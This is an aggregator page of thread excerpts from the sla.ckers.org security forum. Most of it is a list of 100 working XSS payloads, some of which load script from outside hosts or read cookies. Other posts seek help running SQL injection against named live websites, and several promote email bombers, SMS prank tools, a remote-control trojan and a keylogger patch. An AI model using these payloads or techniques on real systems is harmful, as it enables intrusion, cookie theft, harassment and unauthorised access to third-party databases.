Warning: fwrite() expects parameter 1 to be resource, boolean given in /var/www/www.schuirink.net/www/xml/headlines.php on line 383

Warning: fclose() expects parameter 1 to be resource, boolean given in /var/www/www.schuirink.net/www/xml/headlines.php on line 384
sla.ckers.org @ the web & the world :: hundreds of fresh newsfeeds on schuirink.net
main destinations: home | the web & the world | out of here

news headlines

News headlines collected from 498 newsfeeds.

sla.ckers.org | The Web Application Security Forums

url: http://sla.ckers.org

USSD Sender Hacktool 1.1 (2 replies)

What is USSD?
USSD stands for Unstructured Supplementary Service Data and it's mostly use to make requests to a mobile operator. If
you want to check how much money you have on your mobile sim card you can use a USSD Command for that. Entering for
example *#100# to the vodafone network, you will receive an USSD message as a result.

USSD Sender Hacktool is a complex tool that let any web user to send a text message in a USSD command to any number. By
default the message is "You have been hacked!" but you can send any text. In the target phone a message will pop up
with the text and a OK button. If it get's undelivered an actual sms will be send.


MailChimp Email Bomber 1.0 source (no replies)

This app will send mail to your mailbox. Win the possibility of winning $5.00 dollars by paypal just by sending an email to privateloader@iol.pt



CSRF -- Add extra cookie value (1 reply)

Hello All,
I am trying to demonstrate weak CSRF token implementation.
The request structure is something similar to following:

POST /abc HTTP/1.1

Cookie = JSESSIONID=xxxxxxx ; Token = yyyyyyyy

somename= somevalue
token = yyyyyyyy

The token value is not random and can be easily guessed.

We can control "token=" in POST body but we also need to change "token=" value from Cookies: to make both values identical.

I tried to set extra cookie parameter using php, JS but that parameter not getting inserted in actual CSRF request when user clicks on submit button.

Any suggestions?

who can bypass this (no replies)

http://ysts.39yst.com/2012/ login have mysql injection

but only get some data,who can bypass this and select into outfile getshell

MySQL Query : SELECT * FROM `pre_ucenter_members` WHERE `username`='1111' AND EXTRACTVALUE(4905,CONCAT(0x5c,0x7161757671,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x717a666571)) AND 'YiBx'='YiBx'
MySQL Error : XPATH syntax error: '\qauvq39yst_com_bbs_v2qzfeq'
MySQL Errno : 1105
Message : MySQL Query Error

strange xpath injection unable to get through it (1 reply)


Can any one give it a try .


Looking forward for your kind response.


Free Stuff on the mail (2014) (1 reply)

Get all kind of free stuff directly into your mailbox. No hustles or problems of any kind.
Give a mail worker some jobs


Mobile Prank Hacktool 3.6 - Make Pranks to Any one (no replies)

Mobile Prank Hacktool - A tool to send SMS & Call Pranks to any mobile number.
In version 3.6 you can prank members of the Europen Parlament



Vulnerable but doesn't work (1 reply)

Hi all,

this url is vulnérable : (POST)

with data :

i try this :
login=1&action=logue_in&code='||'a'='a&mdp='||1 limit 0,1;#

but i can't connect as a user :( what's wrong ?

any idea ?

Mobile Prank Hacktool 3.5 (no replies)



AWeber Email Bomber 1.1 (no replies)

Simple yet effective email bomber that works with all email providers.


USSD Sender Hacktool 1.0 (no replies)

What is USSD?
USSD stands for Unstructured Supplementary Service Data and it's mostly use to make requests to a mobile operator. If you want to check how much money you have on your mobile sim card you can use a USSD Command for that. Entering for example *#100# to the vodafone network, you will receive an USSD message as a result.

USSD Sender Hacktool is a complex tool that let any web user to send a text message in a USSD command to any number. By default the message is "You have been hacked!" but you can send any text. In the target phone a message will pop up with the text and a OK button. If it get's undelivered an actual sms will be send.

The server behind all this is paid so the file is password protected.
Send a private message requesting the password.

Screen Shot:


RC Trojan 1.2 (1 reply)

RC Trojan is also known as Remote Control Trojan is an aplication that permits the control of a computer remotely in a WAN/LAN.

This trojan should be install in c:\

After extraction/instalation, run
c:\RC\Start Server.lnk

And use your browser to access it...


Virus Scan:

The Art of Exploiting Injection Flaws@ Black hat 2014 (no replies)

Learn advanced techniques in SQL Injection as well as some lesser known injection flaws such as LDAP Injection, Hibernate Query Language Injection, XPATH Injection, XML External Entity Injection, Direct Code injection etc. All attendees will receive FREE access to on-line labs related to the class.


Greeings (1 reply)


I'm having a strange waf issue in id= it does not leting to null the value nor sing via dev 0 .


Looking forward for your kind response.


AWeber Email Bomber 1.0 (no replies)

Send multiple spam emails to any email in the world.

Video Demonstration:

Download FREE:

Virustotal: (1/48)

ICEWARP Client Multiple Versions , Persistent Cross Site Scripting (XSS) (no replies)

Check this out ! :D


XCon 2014 Information Security Conference CFP (no replies)

XCon 2014 Information Security Conference
Call for Paper

August, 20th ?21st , 2014, Beijing, China (http://xcon.xfocus.org)

Upholding rigorous work style, XCon sincerely welcomes contributions from information security technique enthusiasts and expects your participation and sharing.

Anyone who loves information security, including information security experts and fans, network administrators, network security consultants, CIO, hacker technique fans.

Call For Paper:

Topics Range (but unlimited):
--- New Field Security
- Mobile Devices Security (iOS /Android)
- Mobile Internet
- Cloud Security
- Internet Financial / Mobile Payment
- New Network Attack Technologies
- Windows 8 Defensive Technologies
- OSX System Security Technologies
- CDN Provider Security
- Internet of Things/ Hardware Security
- Big Data
- 3G/4G Security

---Special Network and Devices Security
- Transportation Control and Management Networks
- Terminal Security

--- Application Security
- Industrial Control System
- Routing Devices
- Encryption & Decryption Techniques
- Protocol Security & Exploitation
- Web Application Vulnerability Research
- Application Reverses Engineering and Related Automated Tools
- Database Security & Attacks
- Advanced Trojans, Worms and Backdoor Techniques

--- Intrusion Detection / Forensics Analysis
- APT Attacks
- Firewall Bypass
- Traffic Analysis
- Real-time Data Structure Recovery
- File System Analysis & Recovery
- Intrusion Detection and Anti-detection Techniques
- Reverse Engineering (malicious code analysis technique, vulnerability research)

--- Any topics that will catch the attention of the XCon committee and/or the world.

Paper Submission:
The papers need include information as follow:
1) Brief introduction to the topic and whether the topic had been publicized, and if so, the publicized range.
2) Introduction to yourself.
3) Contact information: full name, alias, nationality, network nickname, e-mail, tel, fax, current working place and company, IM (QQ, MSN, or others).
4) Presentation details:
- How long is the presentation?
- If any new tool/vulnerability/Exploit code will be released
5) The paper need include both PPT (for presentation) and WORD (for detailed description) in MS Office or OpenOffice format.

All the papers will be submitted to xcon@huayongxingan.com for preliminary selection. The deadline for submission is on July, 20th, 2014, and the deadline for confirmation is on July, 30th, 2014. No matter if the paper is accepted, we will officially inform you within 7 work days.

Important dates:
* Deadline for submission: July, 20th, 2014
* Deadline for confirmation: July, 30th, 2014

Speakers' privilege:
If your paper is accepted by XCon, you will be invited to give an individual lecture in XCon.
The speakers will be provided with:
- Round-trip plane ticket (Economy class, one person only, foreign speakers up to$1,400.)
- Two days' food and accommodation
- Invitation to celebration party
- Sightseeing some famous places of interests in Beijing, tasting Chinese flavored food
- Luck draw
- Speakers must provide corresponding invoice or credential.
- XCon owns the right of final explanation about the conference.

For more information about the conference, please contact xcon@huayongxingan.com or professional XCon committee Tel: 086-010-62029792.

Application for Attending:
In order to attend the conference, please register at XCon website (http://xcon.xfocus.org) or directly contact the organizer mentioned above.
We will offer different discounts according to the time of application and payment.
Attenders' food and accommodation will be covered by themselves, and XCon will provide restaurant reservation service.

Other information:
All the information about XCon will be released on XCon website.
Please visit http://xcon.xfocus.org/ for more information about speakers, agenda and previous XCon documents.

Thank you for your support !

xss (1 reply)

100 #XSS Vectors

Below you will find 100 XSS vectors including 50 new XSS attack vectors. All vectors works like charm in Chrome :-) I have also specified browser name alongside in case of some vectors that do not work in Chrome.

1) <iframe %00 src="	javascript:prompt(1)	"%00>

2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'

3) <input/onmouseover="javaSCRIPT:confirm(1)"

4) <sVg><scRipt %00>alert(1) {Opera}

5) <img/src=`%00` onerror=this.onerror=confirm(1)

6) <form><isindex formaction="javascript:confirm(1)"

7) <img src=`%00`

8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>

9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

12) "><h1/onmouseover='\u0061lert(1)'>%00

13) <iframe/src="data:text/html,<svg onload=alert(1)>">

14) <meta content="
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>

15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script

16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

18) <iframe src=javascript:alert(document.location)>

19) <form><a href="javascript:\u0061lert(1)">X

20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>

21) <img/	
 src=`~` onerror=prompt(1)>

22) <form><iframe 	

23) <a href="data:application/x-x509-user-cert;

24) http://www.google<script .com>alert(document.location)</script

25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a

26) <img/src=@ 
 onerror = prompt('1')

27) <style/onload=prompt('XSS')

28) <script ^__^>alert(String.fromCharCode(49))</script ^__^

29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

30) �</form><input type="date" onfocus="alert(1)">

31) <form><textarea 

32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

33) <iframe srcdoc='<body onload=prompt(1)>'>

34) <a href="javascript:void(0)" onmouseover=

35) <script ~~~>alert(0%0)</script ~~~>

36) <style/onload=<!--	>

37) <///style///><span %2F onmousemove='alert(1)'>SPAN

38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)

39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'

 onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

41) <marquee onstart='javascript:alert(1)'>^__^

42) <div/style="width:expression(confirm(1))">X</div> {IE7}

43) <iframe/%00/ src=javaSCRIPT:alert(1)

44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//

45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

48) <a/href="javascript:
 javascript:prompt(1)"><input type="X">

49) </plaintext\></|\><plaintext/onmouseover=prompt(1)

50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

I have already tweeted about the following 50 XSS vectors and so far the paste has more than 1600 hits (http://pastebin.com/mQDbu7Sm)

51) <a href="javascript:\u0061l&#101%72t(1)"><button>

52) <div onmouseover='alert(1)'>DIV</div>

53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

54) <a href="jAvAsCrIpT:alert(1)">X</a>

55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

57) <var onmouseover="prompt(1)">On Mouse Over</var>

58) <a href=javascript:alert(document.cookie)>Click Here</a>

59) <img src="/" =_=" title="onerror='prompt(1)'">

60) <%<!--'%><script>alert(1);</script -->

61) <script src="data:text/javascript,alert(1)"></script>

62) <iframe/src \/\/onload = prompt(1)

63) <iframe/onreadystatechange=alert(1)

64) <svg/onload=alert(1)

65) <input value=<><iframe/src=javascript:confirm(1)

66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

67) http://www.<script>alert(1)</script .com

68) <iframe src=j

69) <svg><script ?>alert(1)

70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>

71) <img src=`xx:xx`onerror=alert(1)>

72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>

74) <math><a xlink:href="//jsfiddle.net/t846h/">click

75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

76) <svg contentScriptType=text/vbs><script>MsgBox+1

77) <a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F

81) <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

82) ject data=javascript:\u0061l&#101%72t(1)><ob

83) <script>+-+-1-+-+alert(1)</script>

84) <body/onload=<!-->&#10alert(1)>

85) <script itworksinallbrowsers>/*<script* */alert(1)</script

86) <img src ?itworksonchrome?\/onerror = alert(1)

87) <svg><script>//
confirm(1);</script </svg>

88) <svg><script onlypossibleinopera:-)> alert(1)

89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

90) <script x> alert(1) </script 1=2

91) <div/onmouseover='alert(1)'> style="x:">

92) <--`<img/src=` onerror=alert(1)> --!>

93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script>

94) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

95) "><img src=x onerror=window.open('https://www.google.com/');>

96) <form><button formaction=javascript:alert(1)>CLICKME

97) <math><a xlink:href="//jsfiddle.net/t846h/">click

98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

xss (2 replies)


INSERT INTO in mysql with php - sqlinjection (2 replies)


can u help me .

I want to insert a new password to a database for a "admin" user.
I use the syntax:

insert into members values('admin',,,,'admin@localhost',,,,'','pass','admin','')

but no result returns.

I also use the following syntax:
"select @@version"

and i get a valuable result.

also the mysql version is 5.0.67 .

xss (1 reply)

how to bypass this > and <

pls i need tutorials for CSRF hack (1 reply)

iam beginner in CSRF exloits so please i need any good tutorial for CSRF and iframe


help bypass sqli in search (4 replies)

hey bro
can u help me

how to bypass sqli in this website

http://www.locksupermarket.co.uk/search-result.php?search=1%27 order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50-- -
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27' at line 1


HTTP Traffic (no replies)

For Anyone interest in traffic
Here is a piece of crap, still working...



Happy New Year 2014! (2 replies)

Hey everybody,

i wish you all a very Happy New Year 2014!


Tough mod security (2 replies)


This is as far as I go:

http://wargame.balcan-underground.net/vesti.php?id=2 and true
http://wargame.balcan-underground.net/vesti.php?id=2 and false

http://wargame.balcan-underground.net/vesti.php?id=2 group by 1--
http://wargame.balcan-underground.net/vesti.php?id=2 group by 2--

strang kind of SQL injection (2 replies)

iam trying to hack site but iam get strang massege like that

Warning: sqlite_array_query() [function.sqlite-array-query]

what is this kind ?!! sqlite i didint hear about it before and iam trying to see tutorial for it on this forum but ididnt find any thing.

Port #6000 (1 reply)

I scaned a server and i found the port# 6000(X11) is open but it is accessed denied.
i have a quiestion that can i hacked it?

i can count the number of columns but icant get any other data !!! (5 replies)


iam tried with this site the command +order+by+1--

and iam get the number of columns is 6 but when iam try to do the command

-9+union+select+1,2,3,4,5,6-- ican get the velnaruble column then iam tried with

error based command or 1 group by concat_ws(0x00, version(),hex(rand(0))) having min(0)-- - and no thing too also to chek if its blind with command and substring(@@version,1,1)=5 and
and substring(@@version,1,1)=4

but no chaging in the page but when iam do +and+1=0-- the page changed and when iam do +and+1=1-- the page become normal so idont know what the kind of this SQL error and also iam try this site on SQLmap and shwoing me the site is velnaruble and have 6 columns.

iam need help of MR.ajkaro to know the kind of this erroe and how to execute the command on it.

another question :


this site have error based SQL and when iam give him this command or 1 group by concat_ws(0x00, version(),hex(rand(0))) having min(0)-- -


iam get the version Duplicate entry '5.5.30-cll' for key 'group_key' : select * from yp_gallery_category where cat_id='22' or 1 group by concat_ws(0x00, version(),hex(rand(0))) having min(0)-- -'

but when iam try to get the tables iam see like that


illegal url

and this site too http://www.actualicese.com/tiendavirtual/producto_descontinuado.php?id=85+or+1+group+by+concat_ws%280x7e,%28select+table_name+from+informaion_schema.tables+where+table_schema=database%28%29+limit+0,1%29,floor%28rand%280%29*2%29%29+having+min%280%29--

but iam get that

SELECT command denied to user 'ventas_www'@'' for table 'tables'

iam tried many filters but it doesnt work so i need help pls.

Volume Patch for SpyCobra (1 reply)

There is a problem in some SpyCobra keylogger software that after install any time you press a key the windows emits a beep.

I have reported several times but without luck even with a new copy so i build this Volume Patch.

Works on XP/Vista/7/8
Also tested in Server 2003/2008